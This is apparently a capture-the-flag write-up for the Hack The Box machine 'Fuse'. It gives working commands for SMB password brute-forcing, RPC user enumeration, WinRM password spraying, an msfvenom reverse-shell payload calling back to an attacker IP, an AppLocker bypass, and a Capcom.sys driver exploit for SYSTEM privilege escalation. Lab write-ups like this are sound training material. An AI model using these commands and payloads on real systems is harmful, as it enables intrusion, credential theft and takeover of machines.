# Fuse ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FNRcCRnZkSE2cZFNcfL6I%2Ffuse.png?alt=media\&token=05e7d5c5-0e54-4706-8f3e-7efb47ccede5) ## Enumeration As usual, we start with an nmap scan, in order to find open ports in the target machine. The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.193 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Fri Jan 7 21:16:49 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.193 Warning: 10.10.10.193 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.193 Host is up (0.100s latency). Not shown: 65516 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 5985/tcp open wsman 9389/tcp open adws 49666/tcp open unknown 49667/tcp open unknown 49675/tcp open unknown 49676/tcp open unknown 49678/tcp open unknown 49700/tcp open unknown # Nmap done at Fri Jan 7 21:17:29 2022 -- 1 IP address (1 host up) scanned in 40.16 seconds ``` As we see, there are quite a lot of ports open. Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 10.10.10.193 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Fri Jan 7 21:18:38 2022 as: nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 -oN targeted 10.10.10.193 Nmap scan report for 10.10.10.193 Host is up (0.11s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 20:31:48Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h53m00s, deviation: 4h37m10s, median: 12m59s | smb2-time: | date: 2022-01-07T20:31:53 |_ start_date: 2022-01-07T20:29:22 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2022-01-07T12:31:56-08:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jan 7 21:19:35 2022 -- 1 IP address (1 host up) scanned in 57.23 seconds ``` First things first, let's add the domain names to the `/etc/hosts` file. > nano /etc/hosts ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa-virtualbox ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.193 fabricorp.local fuse.fabricorp.local ``` If we take a look at the website on `http://10.10.10.193`, we'll see a printer website. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FQRuoFFd9564lEql9EiaG%2FCaptura%20de%20pantalla%202022-02-10%20202645.png?alt=media\&token=0bf325c2-d160-4c24-b0ad-0914241a2715) We can see on the *Print Logs* section, three logs. If we click on the *View* button of each log, we'll see some users. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FIJbEhHNRVFDymx4843H3%2FCaptura%20de%20pantalla%202022-02-10%20203221.png?alt=media\&token=d793e495-92fc-4533-be54-05f5232301a7) ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FH8Ct5K5sdjQlolwovk8c%2FCaptura%20de%20pantalla%202022-02-10%20204404.png?alt=media\&token=04714027-4125-4075-b650-6990c6a5414a) ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FxIN7fBXw8sjBn8moiZ4T%2FCaptura%20de%20pantalla%202022-02-10%20204420.png?alt=media\&token=4b32c288-0c49-4ec5-aa0a-a01b662e89a9) ## Exploitation Let's add the users *pmerton*, *tlavel*, *sthompson*, *bhult* and *administrator* to a file. At this point, we can use the *cewl* tool. This tool makes a dictionary based on a web page. > cewl -w passwords --with-numbers * `-w` write the output to a **file**. * `--with-numbers` accept words with **numbers**. Now that we've got some users and passwords, we can try to brute force the *SMB* service with *crackmapexec*. The following command will try to log in with each users, and with each password from the dictionary. It continues trying in spite of finding valid credentials, and it doesn't show logon failures. > crackmapexec smb 10.10.10.193 -u users -p passwords --continue-on-success | grep -v FAILURE * `-u` **users** file. * `-p` **passwords** file. * `---continue-on-success` **continues** authentication attempts even after successes. * `-v` select lines which **don't match**. ``` SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True) SMB 10.10.10.193 445 FUSE [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE ``` It found that the `Farbricorp01` password must be changed for the users *tlavel* and *bhult*. The idea here, is to change the password of the *bhult* user, and then log in into the *RPC* server. Once we are logged in, we can enumerate all the domain users, as we have done in other HTB machines. Let's change the *bhult* password remotely with the *smbpasswd* tool. > smbpasswd -r 10.10.10.193 -U "bhult" ``` Old SMB password: Fabricorp01 New SMB password: alfa8sa!$ Retype new SMB password: alfa8sa!$ Password changed for user bhult on 10.10.10.193. ``` Now let's log with the user `bhult` and the password `alfa8sa!$` into the *RPC* server. {% hint style="warning" %} You will have to log in into the RPC server **quickly**, because there is a scheduled task that changes the password that you've just already changed. {% endhint %} > rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193 ``` rpcclient $> ``` From here we can enumerate several things. The first one are the domain users. > rpcclient $> enumdomusers ``` user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3] ``` We can clean the output of the domain users and write it into a file. > rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193 -c "enumdomusers" | grep -oP "\\\[.\*?\\]" | grep "0x" -v | tr -d "\[]" > users We can also enumerate printers. If we do it, we'll see a password at the description of the printer. > rpcclient $> enumprinters ``` flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:[] ``` Now we have a list of the domain users and the `$fab@s3Rv1ce$1` password, let's see if we can have a shell via *winrm* as any user with that password. > crackmapexec winrm 10.10.10.193 -u users -p '$fab\@s3Rv1ce$1' --continue-on-success * `-u` **users** file. * `-p` **passwords** file. * `---continue-on-success` **continues** authentication attempts even after successes. ``` WINRM 10.10.10.193 5985 FUSE [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local) WINRM 10.10.10.193 5985 FUSE [*] http://10.10.10.193:5985/wsman WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\Guest:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!) WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\svc-scan:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\bhult:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\astein:$fab@s3Rv1ce$1 WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1 ``` And we see we can have a shell with the user `svc-print` and the password `$fab@s3Rv1ce$1`. Once we get the shell, we could grab the user flag. > evil-winrm -i 10.10.10.193 -u 'svc-print' -p '$fab\@s3Rv1ce$1' ``` Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents> whoami fabricorp\svc-print *Evil-WinRM* PS C:\Users\svc-print\Documents> type \users\svc-print\desktop\user.txt 504c8acb72ed8276d310291e93713482 ``` ## Privilege Escalation Let's see what privileges we have. > whoami /priv ``` PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled ``` The `SeLoadDriverPrivilege` privilege is enabled. If you search how to escalate privileges with that privilege enabled, you'll find a great [article ](https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)from *Tarlogic* which explains how to become the `NT AUTHORITY\SYSTEM` user. {% hint style="info" %} A user with the **SeLoadDriverPrivilege** assigned is allowed to dynamically load device drivers. The activation of this privilege in the context of non-privileged users implies a significant risk due to the possibility of executing code in kernel space. {% endhint %} The article explains that we have to use the *EplLoadDriver* tool. But, if we go to it's [official github](https://github.com/TarlogicSecurity/EoPLoadDriver/), we can only download a `.ccp` file. This means that we have to compile it on Windows. First, let's create a folder on the desktop called *FUSE*, and open a command prompt inside it. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F1zdZMduo2jNYSHBlUsvY%2FCaptura%20de%20pantalla%202022-02-10%20224756.png?alt=media\&token=8281d7aa-acf8-4ce8-84ca-ac88451b4e38) Next, let's download the *EoPLoadDriver* github repository, with the `.cpp` file on it. > git clone ``` Cloning into 'EoPLoadDriver'... remote: Enumerating objects: 10, done. remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10 Receiving objects: 100% (10/10), 5.16 KiB | 1.72 MiB/s, done. Resolving deltas: 100% (2/2), done. ``` Then we'll have to open *Visual Studio Code*, and create a new project. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FljfedajZ9WNjHBlJerSn%2FCaptura%20de%20pantalla%202022-02-10%20230744.png?alt=media\&token=d77ceac1-4cde-4b8e-8507-cb441b9995aa) Select the *Console App*. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fs5oSY3qlota1Jl31hWle%2FCaptura%20de%20pantalla%202022-02-10%20231120.png?alt=media\&token=5cb63c5b-7298-4c0e-9a23-ca499482c22e) Insert the project name. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fe6akHU1hS7bQhULm0UN3%2FCaptura%20de%20pantalla%202022-02-10%20231319.png?alt=media\&token=3a0f4adb-29e1-43c2-9e3f-94b5b670ad93) Once the project is open, we'll have to copy the [eoploaddriver.cpp](https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp) code and paste it into the project. Then we'll have to delete the first *include* line `#include "stadfx.h"`. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Ffd1iqN8mCs5QdQFFb8Jn%2FCaptura%20de%20pantalla%202022-02-10%20232727.png?alt=media\&token=2ca2237a-4a87-4cc2-bf2f-fb70093b6e38) To compile it, let's select `Release` and `x64`. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FjkhOaU4ixtw6GIaerIES%2FCaptura%20de%20pantalla%202022-02-10%20232844.png?alt=media\&token=c7ccaabd-68ad-4265-94f1-87ef1fa8d2dd) And finally, press *Build* > *Rebuild Solution*. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FJExk1oDjb9z9N5FmoGiC%2FCaptura%20de%20pantalla%202022-02-10%20233005.png?alt=media\&token=24bb518b-dc15-4d07-a632-d03ff83982a1) Once it ends, it will store the binary at `C:\Users\alfa8sa\source\repos\EoPLoadDriver\x64\Release\EoPLoadDriver.exe`. Let's move it to the *FUSE* folder. It is also needed the `Capcom.sys` file. Download it from it's [github](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys), and move it to the *FUSE* folder. Then, we'll have to download the [ExploitCapcom.sln](https://github.com/tandasat/ExploitCapcom/blob/master/ExploitCapcom/ExploitCapcom.sln) file and compile it with *Visual Studio Code* again. Let's clone the [ExploitCapcom](https://github.com/tandasat/ExploitCapcom) github repository. > git clone ``` Cloning into 'ExploitCapcom'... remote: Enumerating objects: 58, done. remote: Counting objects: 100% (24/24), done. remote: Compressing objects: 100% (20/20), done. remote: Total 58 (delta 11), reused 11 (delta 4), pack-reused 34 Receiving objects: 100% (58/58), 142.24 KiB | 2.54 MiB/s, done. Resolving deltas: 100% (19/19), done. ``` Then, on *Visual Studio Code,* press on *File* > *Open* > *Project/Solution...* and select the `ExploitCapcom.sln` file. Next, select the `ExploitCapcom.cpp` on the *Solution Explorer* section. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fb1UQI4Oa7rWRFzMSSiQq%2FCaptura%20de%20pantalla%202022-02-10%20235400.png?alt=media\&token=b7683c42-fea8-466e-b89f-017d51978019) At the end of the code, we can see that the binary is executing the `cmd.exe` program. But I am going to change that, becouse I want to execute a malicious file called `reverse.exe`, which is going to send us back a reverse shell. To avoid *AppLocker*, I will put the malicious file in a directory listed on the [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md). ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FSam3LzzOef1IaKKtywCe%2FCaptura%20de%20pantalla%202022-02-11%20000127.png?alt=media\&token=344634b2-cf4f-437d-8c00-bf7557d24f3d) Then compile it like before, and move the binary to the FUSE folder. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FJExk1oDjb9z9N5FmoGiC%2FCaptura%20de%20pantalla%202022-02-10%20233005.png?alt=media\&token=24bb518b-dc15-4d07-a632-d03ff83982a1) Finally, we have the `EopLoadDriver.exe`, `ExploitCapcom.exe` and the `Capcom.sys` binaries on our *FUSE* folder. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fo1CGnu4QCKNVJVa4zW6W%2FCaptura%20de%20pantalla%202022-02-11%20230319.png?alt=media\&token=70e68a7c-5fc6-4a7c-bb6f-a666a38f8307) Let's transfer those into our *Linux* machine with the `http.server` python module. > python -m http.server On our Linux machine. > wget > > wget > > wget Now we need to create the malicious file which will send us a reverse shell. It has to be named `reverse.exe`. > msfvenom -p windows/x64/shell*reverse*tcp lhost=10.10.14.22 lport=4444 -f exe -o reverse.exe Now we have to upload those binaries to the victim machine. We can do it with the *Upload* functionality from *evil-winrm*. Let's move to the `C:\Windows\System32\spool\drivers\color` directory on the victim machine, and upload them with evil-winrm. > upload EopLoadDriver.exe > > upload ExploitCapcom.exe > > upload Capcom.sys > > upload reverse.exe > > dir ``` Directory: C:\windows\system32\spool\drivers\color Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/11/2022 2:37 PM 10576 Capcom.sys -a---- 7/16/2016 6:12 AM 1058 D50.camp -a---- 7/16/2016 6:12 AM 1079 D65.camp -a---- 2/11/2022 2:35 PM 15360 EopLoadDriver.exe -a---- 2/11/2022 2:36 PM 1875968 ExploitCapcom.exe -a---- 7/16/2016 6:12 AM 797 Graphics.gmmp -a---- 7/16/2016 6:12 AM 838 MediaSim.gmmp -a---- 7/16/2016 6:12 AM 786 Photo.gmmp -a---- 7/16/2016 6:12 AM 822 Proofing.gmmp -a---- 2/11/2022 2:37 PM 7168 reverse.exe -a---- 7/16/2016 6:12 AM 218103 RSWOP.icm -a---- 7/16/2016 6:12 AM 3144 sRGB Color Space Profile.icm -a---- 7/16/2016 6:12 AM 17155 wscRGB.cdmp -a---- 7/16/2016 6:12 AM 1578 wsRGB.cdmp ``` Before running the binaries, let's set a netcat listener on port 4444. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now all we have to do is run the following commands. > C:\windows\system32\spool\drivers\color\EopLoadDriver.exe System\CurrentControlSet\alfa8sa C:\windows\system32\spool\drivers\color\Capcom.sys ``` [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\alfa8sa NTSTATUS: 00000000, WinError: 0 ``` > C:\windows\system32\spool\drivers\color\ExploitCapcom.exe ``` [*] Capcom.sys exploit [*] Capcom.sys handle was obtained as 0000000000000038 [*] Shellcode was placed at 00000205D3BD0008 [+] Shellcode was executed [+] Token stealing was successful [+] The SYSTEM shell was launched [*] Press any key to exit this program ``` And we should get the reverse shell as the `NT AUTHORITY\SYSTEM` user. Then all we have to do is reap the harvest and take the root flag. ``` listening on [any] 4444 ... connect to [10.10.14.22] from (UNKNOWN) [10.10.10.193] 49814 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\windows\system32\spool\drivers\color>whoami whoami nt authority\system C:\windows\system32\spool\drivers\color>type \users\administrator\desktop\root.txt type \users\administrator\desktop\root.txt 6ad78ce332c9a222c30b6108f4ed148f ```